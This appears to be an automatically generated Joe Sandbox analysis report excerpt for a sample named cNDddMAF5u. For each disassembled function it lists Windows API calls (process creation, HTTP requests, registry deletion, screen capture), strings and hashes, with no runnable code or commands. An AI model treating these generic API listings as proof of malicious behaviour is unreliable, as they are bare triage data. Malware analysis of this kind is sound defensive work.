_wcslen.LIBCMT ref: 0071463F
_wcslen.LIBCMT ref: 007146A7

Part of subcall function 006BF9F2: _wcslen.LIBCMT ref: 006BF9FD

GetDriveTypeW.KERNEL32(?,00766BF0,00000061), ref: 00714743

Strings

fixed, xrefs: 00714635, 0071463A
removable, xrefs: 007145EA, 007145EF
network, xrefs: 0071469D, 007146A2
all, xrefs: 00714531, 00714536
unknown, xrefs: 00714708
ramdisk, xrefs: 007146F1
cdrom, xrefs: 0071458F, 00714594

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: _wcslen$BuffCharDriveLowerType
String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
API String ID: 2055661098-1000479233
Opcode ID: c659b4fdae1529582c7ee697ca3e4a77a64112879e951746d9c4c3c6dbbc1cc7
Instruction ID: 7c8642b8ad8156410f609ff5ccaa7c26a51d639d55cb7a21dadd2c1e889e42dc
Opcode Fuzzy Hash: c659b4fdae1529582c7ee697ca3e4a77a64112879e951746d9c4c3c6dbbc1cc7
Instruction Fuzzy Hash: CDB1C1716083029FC710EF28C890AAAB7E6BF96764F50491DF496C72D1D738DD84CBA2

Function 0073911E Relevance: 24.7, APIs: 10, Strings: 4, Instructions: 181windowfileCOMMON

Download Yara Rule

APIs

Part of subcall function 006B9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 006B9BB2

DragQueryPoint.SHELL32(?,?), ref: 00739147

Part of subcall function 00737674: ClientToScreen.USER32(?,?), ref: 0073769A
Part of subcall function 00737674: GetWindowRect.USER32(?,?), ref: 00737710
Part of subcall function 00737674: PtInRect.USER32(?,?,00738B89), ref: 00737720

SendMessageW.USER32(?,000000B0,?,?), ref: 007391B0
DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 007391BB
DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 007391DE
SendMessageW.USER32(?,000000C2,00000001,?), ref: 00739225
SendMessageW.USER32(?,000000B0,?,?), ref: 0073923E
SendMessageW.USER32(?,000000B1,?,?), ref: 00739255
SendMessageW.USER32(?,000000B1,?,?), ref: 00739277
DragFinish.SHELL32(?), ref: 0073927E
DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00739371

Strings

@GUI_DRAGFILE, xrefs: 00739320
@GUI_DRAGID, xrefs: 007392E9
@GUI_DROPID, xrefs: 0073929E
p#w, xrefs: 007392BB

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$p#w
API String ID: 221274066-3190343874
Opcode ID: d3fb1cb54dd5c8ba8a8a23174f3f3a693c6d64c13b5219e8671ad1351c09b764
Instruction ID: 6a146d744b4a02d668d0a890b8ddb502a44986eb5701f0b23f5b94bb90e1f754
Opcode Fuzzy Hash: d3fb1cb54dd5c8ba8a8a23174f3f3a693c6d64c13b5219e8671ad1351c09b764
Instruction Fuzzy Hash: 7E618C71108300AFD701EF64CC85DAFBBE9EF89350F10492EF696921A1DB749A49CB66

Function 0072AFF9 Relevance: 24.4, APIs: 16, Instructions: 418processCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0072B198
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0072B1B0
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0072B1D4
_wcslen.LIBCMT ref: 0072B200
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0072B214
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0072B236
_wcslen.LIBCMT ref: 0072B332

Part of subcall function 007105A7: GetStdHandle.KERNEL32(000000F6), ref: 007105C6

_wcslen.LIBCMT ref: 0072B34B
_wcslen.LIBCMT ref: 0072B366
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0072B3B6
GetLastError.KERNEL32(00000000), ref: 0072B407
CloseHandle.KERNEL32(?), ref: 0072B439
CloseHandle.KERNEL32(00000000), ref: 0072B44A
CloseHandle.KERNEL32(00000000), ref: 0072B45C
CloseHandle.KERNEL32(00000000), ref: 0072B46E
CloseHandle.KERNEL32(?), ref: 0072B4E3

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
String ID:
API String ID: 2178637699-0
Opcode ID: 9a15a7b23b4b816eb1050ce2c07a027628524cb99301ebce47f946601c2dadc4
Instruction ID: 3be2db056e89eed85462b5b07c4df285fcc9a39665d66e3994962329bdf7d7ad
Opcode Fuzzy Hash: 9a15a7b23b4b816eb1050ce2c07a027628524cb99301ebce47f946601c2dadc4
Instruction Fuzzy Hash: E5F1AB31604350DFC765EF24D891B6EBBE2AF85310F18855DF8999B2A2CB35EC40CB96

Function 006A326F Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 214windowCOMMON

Download Yara Rule

APIs

GetMenuItemCount.USER32(00771990), ref: 006E2F8D
GetMenuItemCount.USER32(00771990), ref: 006E303D
GetCursorPos.USER32(?), ref: 006E3081
SetForegroundWindow.USER32(00000000), ref: 006E308A
TrackPopupMenuEx.USER32(00771990,00000000,?,00000000,00000000,00000000), ref: 006E309D
PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 006E30A9

Strings

0, xrefs: 006A327D

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
String ID: 0
API String ID: 36266755-4108050209
Opcode ID: 4954cdd648fdd5a89199e29770ac3fe7c1823204f54856994302163231f550f0
Instruction ID: a35917a974580c276d3a451e2feb7ee5a3aa48f9d08ff189e56d33124a17e438
Opcode Fuzzy Hash: 4954cdd648fdd5a89199e29770ac3fe7c1823204f54856994302163231f550f0
Instruction Fuzzy Hash: 58710531641366BAFB219F25CC59FEABF6AFF01364F204206F5146A2E1C7B5AE50CB50

Function 00736CD9 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 194windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?), ref: 00736DEB

Part of subcall function 006A6B57: _wcslen.LIBCMT ref: 006A6B6A

CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00736E5F
SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00736E81
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00736E94
DestroyWindow.USER32(?), ref: 00736EB5
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,006A0000,00000000), ref: 00736EE4
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00736EFD
GetDesktopWindow.USER32 ref: 00736F16
GetWindowRect.USER32(00000000), ref: 00736F1D
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00736F35
SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00736F4D

Part of subcall function 006B9944: GetWindowLongW.USER32(?,000000EB), ref: 006B9952

Strings

0, xrefs: 00736D98
tooltips_class32, xrefs: 00736E58, 00736EDD

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
String ID: 0$tooltips_class32
API String ID: 2429346358-3619404913
Opcode ID: 3d393c0c3979a1ab3f32dcaa74c82878fad0bb1cbbe772b77faebff255571e6a
Instruction ID: cbf19c50416f8eacd9768b6c7b1d15fbbcbb566ad5a2f01af6a3405c7af597fa
Opcode Fuzzy Hash: 3d393c0c3979a1ab3f32dcaa74c82878fad0bb1cbbe772b77faebff255571e6a
Instruction Fuzzy Hash: 06718CB0104241AFEB21CF18DC44F6ABBE9FB89304F44841DFA8997261C778E946CF25

Function 0071C476 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 143networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0071C4B0
GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 0071C4C3
SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 0071C4D7
HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0071C4F0
InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 0071C533
InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 0071C549
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0071C554
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0071C584
GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 0071C5DC
SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 0071C5F0
InternetCloseHandle.WININET(00000000), ref: 0071C5FB

Strings

, xrefs: 0071C575

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
String ID:
API String ID: 3800310941-3916222277
Opcode ID: 0b6aa25af4193ebeeb0f21235115f38f675d890097c8f47fb0bdbe1b5680cfbf
Instruction ID: a8c81926f7a46b35477e59bd5b25106e6e9514c512285e04fe0f483b4c416cdb
Opcode Fuzzy Hash: 0b6aa25af4193ebeeb0f21235115f38f675d890097c8f47fb0bdbe1b5680cfbf
Instruction Fuzzy Hash: EF5150B1540204BFEB228FA8C948ABB7BFDFF08755F108419F945D6290D738E994DB61

Function 0073856F Relevance: 22.6, APIs: 15, Instructions: 131filecommemoryCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00000000,?,000000EC), ref: 00738592
GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 007385A2
GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 007385AD
CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 007385BA
GlobalLock.KERNEL32(00000000), ref: 007385C8
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 007385D7
GlobalUnlock.KERNEL32(00000000), ref: 007385E0
CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 007385E7
CreateStreamOnHGlobal.OLE32(00000000,00000001,000000F0,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 007385F8
OleLoadPicture.OLEAUT32(000000F0,00000000,00000000,0073FC38,?), ref: 00738611
GlobalFree.KERNEL32(00000000), ref: 00738621
GetObjectW.GDI32(?,00000018,?), ref: 00738641
CopyImage.USER32(?,00000000,00000000,?,00002000), ref: 00738671
DeleteObject.GDI32(?), ref: 00738699
SendMessageW.USER32(?,00000172,00000000,00000000), ref: 007386AF

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
String ID:
API String ID: 3840717409-0
Opcode ID: 4e89b7d81ed9a8cbf3bd941fc0cda1d7aec282c5a6f435173de335317d07bedb
Instruction ID: d16cf362492bb70a7ba612d8194945870ac004bf9c61d0dd4e9d71c026ba0872
Opcode Fuzzy Hash: 4e89b7d81ed9a8cbf3bd941fc0cda1d7aec282c5a6f435173de335317d07bedb
Instruction Fuzzy Hash: 91410D75600208EFEB119F65DC49EAB7BB8FF89711F108058F905E7251DB389D01DB65

Function 007114BD Relevance: 21.4, APIs: 10, Strings: 2, Instructions: 360timeCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(00000000), ref: 00711502
VariantCopy.OLEAUT32(?,?), ref: 0071150B
VariantClear.OLEAUT32(?), ref: 00711517
VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 007115FB
VarR8FromDec.OLEAUT32(?,?), ref: 00711657
VariantInit.OLEAUT32(?), ref: 00711708
SysFreeString.OLEAUT32(?), ref: 0071178C
VariantClear.OLEAUT32(?), ref: 007117D8
VariantClear.OLEAUT32(?), ref: 007117E7
VariantInit.OLEAUT32(00000000), ref: 00711823

Strings

Default, xrefs: 007116AF
%4d%02d%02d%02d%02d%02d, xrefs: 00711625

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem
String ID: %4d%02d%02d%02d%02d%02d$Default
API String ID: 1234038744-3931177956
Opcode ID: d323cec45af22513e67875141fe1c5d2f1912fe82f96cf526c7e03042e6ffabf
Instruction ID: 48bf4f79321529e19f64ee4ed2a3ea28910128334877b782ec46e91cfe466b23
Opcode Fuzzy Hash: d323cec45af22513e67875141fe1c5d2f1912fe82f96cf526c7e03042e6ffabf
Instruction Fuzzy Hash: D3D10271A00115DBDB10AF68D885BFDB7B6BF45700F90815AE646AF2C0DB38ED90DB62

Function 0072B60E Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 285registrylibraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 006A9CB3: _wcslen.LIBCMT ref: 006A9CBD

Part of subcall function 0072C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0072B6AE,?,?), ref: 0072C9B5
Part of subcall function 0072C998: _wcslen.LIBCMT ref: 0072C9F1
Part of subcall function 0072C998: _wcslen.LIBCMT ref: 0072CA68
Part of subcall function 0072C998: _wcslen.LIBCMT ref: 0072CA9E

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0072B6F4
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0072B772
RegDeleteValueW.ADVAPI32(?,?), ref: 0072B80A
RegCloseKey.ADVAPI32(?), ref: 0072B87E
RegCloseKey.ADVAPI32(?), ref: 0072B89C
LoadLibraryA.KERNEL32(advapi32.dll), ref: 0072B8F2
GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 0072B904
RegDeleteKeyW.ADVAPI32(?,?), ref: 0072B922
FreeLibrary.KERNEL32(00000000), ref: 0072B983
RegCloseKey.ADVAPI32(00000000), ref: 0072B994

Strings

advapi32.dll, xrefs: 0072B8ED
RegDeleteKeyExW, xrefs: 0072B8FE

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 146587525-4033151799
Opcode ID: 45bdbf43f32d3eea3d44f12cd31aa0f7959859ef907d3153a460da307cef9297
Instruction ID: 26ddfb0acd777ac6e62fff0523f6ba72261453c13f7c0729685052143c7b639e
Opcode Fuzzy Hash: 45bdbf43f32d3eea3d44f12cd31aa0f7959859ef907d3153a460da307cef9297
Instruction Fuzzy Hash: E9C18A34208211EFD714EF24D494F2ABBE5BF85318F14849CF59A8B2A2CB39EC45CB91

Function 0072255C Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 169windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 007225D8
CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 007225E8
CreateCompatibleDC.GDI32(?), ref: 007225F4
SelectObject.GDI32(00000000,?), ref: 00722601
StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 0072266D
GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 007226AC
GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 007226D0
SelectObject.GDI32(?,?), ref: 007226D8
DeleteObject.GDI32(?), ref: 007226E1
DeleteDC.GDI32(?), ref: 007226E8
ReleaseDC.USER32(00000000,?), ref: 007226F3

Strings

(, xrefs: 0072268D

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
String ID: (
API String ID: 2598888154-3887548279
Opcode ID: 53c639c54d69638a7b7bde069932950a307f47df69fe7f435fced598b13bf24c
Instruction ID: 07d1050877cc11105a2a609401beb319672b2a0132ba8ceeb2ea7621b33a2c02
Opcode Fuzzy Hash: 53c639c54d69638a7b7bde069932950a307f47df69fe7f435fced598b13bf24c
Instruction Fuzzy Hash: 396113B6D00219EFDF15CFA4DC84AAEBBB6FF48310F208429E955A7250D774A941CF64

Function 006DDA5D Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 006DDAA1

Part of subcall function 006DD63C: _free.LIBCMT ref: 006DD659
Part of subcall function 006DD63C: _free.LIBCMT ref: 006DD66B
Part of subcall function 006DD63C: _free.LIBCMT ref: 006DD67D
Part of subcall function 006DD63C: _free.LIBCMT ref: 006DD68F
Part of subcall function 006DD63C: _free.LIBCMT ref: 006DD6A1
Part of subcall function 006DD63C: _free.LIBCMT ref: 006DD6B3
Part of subcall function 006DD63C: _free.LIBCMT ref: 006DD6C5
Part of subcall function 006DD63C: _free.LIBCMT ref: 006DD6D7
Part of subcall function 006DD63C: _free.LIBCMT ref: 006DD6E9
Part of subcall function 006DD63C: _free.LIBCMT ref: 006DD6FB
Part of subcall function 006DD63C: _free.LIBCMT ref: 006DD70D
Part of subcall function 006DD63C: _free.LIBCMT ref: 006DD71F
Part of subcall function 006DD63C: _free.LIBCMT ref: 006DD731

_free.LIBCMT ref: 006DDA96

Part of subcall function 006D29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,006DD7D1,00000000,00000000,00000000,00000000,?,006DD7F8,00000000,00000007,00000000,?,006DDBF5,00000000), ref: 006D29DE
Part of subcall function 006D29C8: GetLastError.KERNEL32(00000000,?,006DD7D1,00000000,00000000,00000000,00000000,?,006DD7F8,00000000,00000007,00000000,?,006DDBF5,00000000,00000000), ref: 006D29F0

_free.LIBCMT ref: 006DDAB8
_free.LIBCMT ref: 006DDACD
_free.LIBCMT ref: 006DDAD8
_free.LIBCMT ref: 006DDAFA
_free.LIBCMT ref: 006DDB0D
_free.LIBCMT ref: 006DDB1B
_free.LIBCMT ref: 006DDB26
_free.LIBCMT ref: 006DDB5E
_free.LIBCMT ref: 006DDB65
_free.LIBCMT ref: 006DDB82
_free.LIBCMT ref: 006DDB9A

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 5fd5e31266300c099d94a075196fd366224b7679fe77be2a5f088ddcea899e6e
Instruction ID: 2241e99c7f60839ffd07b0983069f4721184d4e85bf8db2cbbc6f475e360c975
Opcode Fuzzy Hash: 5fd5e31266300c099d94a075196fd366224b7679fe77be2a5f088ddcea899e6e
Instruction Fuzzy Hash: 87317C71E042069FEB61BA39E851B9A77EAFF10714F14442FE449DB391DA30AC409724

Function 0070365B Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 267windowtimeCOMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 0070369C
_wcslen.LIBCMT ref: 007036A7
SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00703797
GetClassNameW.USER32(?,?,00000400), ref: 0070380C
GetDlgCtrlID.USER32(?), ref: 0070385D
GetWindowRect.USER32(?,?), ref: 00703882
GetParent.USER32(?), ref: 007038A0
ScreenToClient.USER32(00000000), ref: 007038A7
GetClassNameW.USER32(?,?,00000100), ref: 00703921
GetWindowTextW.USER32(?,?,00000400), ref: 0070395D

Strings

%s%u, xrefs: 00703734

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout_wcslen
String ID: %s%u
API String ID: 4010501982-679674701
Opcode ID: 5882527444343c08f8870d8baa18486462216f06c8a5ee7a4e094bce5cd37010
Instruction ID: 89f6bc9b4187392357892ea569b0d5c0cf5bddd9b17231cc30a8a2463fdf7414
Opcode Fuzzy Hash: 5882527444343c08f8870d8baa18486462216f06c8a5ee7a4e094bce5cd37010
Instruction Fuzzy Hash: DE919B71204606EFD719DF24C885FAAB7EDFF44354F008629F99AD21D0DB38AA45CBA1

Function 00704954 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 253COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000400), ref: 00704994
GetWindowTextW.USER32(?,?,00000400), ref: 007049DA
_wcslen.LIBCMT ref: 007049EB
CharUpperBuffW.USER32(?,00000000), ref: 007049F7
_wcsstr.LIBVCRUNTIME ref: 00704A2C
GetClassNameW.USER32(00000018,?,00000400), ref: 00704A64
GetWindowTextW.USER32(?,?,00000400), ref: 00704A9D
GetClassNameW.USER32(00000018,?,00000400), ref: 00704AE6
GetClassNameW.USER32(?,?,00000400), ref: 00704B20
GetWindowRect.USER32(?,?), ref: 00704B8B

Strings

ThumbnailClass, xrefs: 00704A6F, 00704AF1

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
